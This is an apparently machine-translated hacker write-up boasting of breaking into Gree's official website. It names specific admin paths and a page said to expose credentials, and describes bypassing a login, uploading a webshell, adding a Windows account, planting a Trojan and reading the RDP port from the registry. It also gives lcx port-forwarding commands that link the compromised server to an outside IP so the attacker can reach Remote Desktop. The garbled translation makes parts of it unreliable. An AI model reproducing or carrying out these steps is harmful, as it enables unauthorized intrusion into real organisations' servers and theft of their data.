Friendship detection gree Official Website

Gree official website http://www.gree.com

Today, I accidentally saw someone in the group saying that Gree's official website was accessible ..

I went to Gree's website when I had nothing to do with it. The result was naturally ideal.☺

Directly scan the sensitive directory in the background by using the artifact.

 

Directly expose the background address

Http://www.gree.com/admin/config/main.jsp

 

Http://www.gree.com/admin/config

Two backend addresses

 

The sensitive directory's background account password information is also displayed.

Http://www.gree.com/admin/db.jsp

Log on to the http://www.gree.com/admin/config/main.jsp with the obtained account password

Then open the http://www.gree.com/admin/main.jsp requires account password login but did not get a valid account password and then UP the way to remind the browser to intrude into the Method

First open with the account password login http://www.gree.com/admin/config/main.jsp with the account password login and then open the http://www.gree.com/admin/main.js
P to the background login interface because the background does not allow right-click, so the decisive shortcut Ctrl + F5 refresh the background, then you will be pleasantly surprised to find that the background has entered

Www.2cto.com and later found the upload and decisively passed a shell up By: Aepl │ love

+ Shards +

By: bingfeng assassin

I took the webshell from my lover and sent a kitchen knife to my pony ^_^

With the system permission, an account netuser -- icesword is added directly.

 

After adding an account, I found the Intranet server, which is a lot of trouble.

However, tasklist looked at the process and found that it was not soft. Simply plant a Trojan.

D :\~~~ \> Start C: \ wmpub \ ice.exe

 

In other words, I am still afraid of port forwarding. My 2 M bandwidth is too painful. In fact, I planted a Trojan to facilitate port forwarding.

Next, let's look at the remote Port:

D :\~~~ \> REG query HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ WinStations \ RDP-Tcp/v PortNumber

Port number --> 0x19c8 = 6060 (0x1908 is the hexadecimal number of 6060)

 

Now start port forwarding:

Local cmd:

#> C: \ lcx.exe-listen 2222 3333

/* Comment: 2222 -- forwarding port; 3333 -- connection port */

Zombie server cmd:

#> C: \ wmpub \ lcx.exe-slave 110.88.55.78 2222 127.0.0.1 6060

/* Note: 110.88.55.78 is the local IP address; 6060 is the Remote Desktop port of the server */

Press Enter on the cmd command lines on both sides, and mstsc connects 127.0.0.1: 3333. (We can see that the windows on both sides are continuously sending and receiving packets)

From: http://hi.baidu.com/421717582